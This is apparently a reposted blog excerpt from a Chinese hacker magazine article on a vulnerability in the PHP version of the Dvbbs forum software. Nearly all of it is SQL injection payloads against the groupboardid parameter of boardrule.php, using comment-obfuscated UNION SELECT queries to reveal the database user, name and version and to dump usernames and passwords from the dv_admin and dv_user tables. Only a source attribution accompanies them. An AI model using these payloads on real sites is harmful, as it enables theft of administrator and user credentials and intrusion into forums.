boardrule.php?groupboardid=11111/**/union/**/select/**/concat(user(),0x3f,database(),0x3f,version())/*
/**/union/**/select/**/concat(username,0x3f,password,0x3f,adduser)/**/from /**/dv_admin/*
/**/union/**/select/**/concat(username,0x3f,userpassword,0x3f,adduser)/**/from /**/dv_user/*
*/where/**/usergroupid=1/*
boardrule.php?groupboardid=
以上代码节选自《黑客手册》第四期 rabbitsafe的《最新动网PHP版漏洞》文章。
本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/71570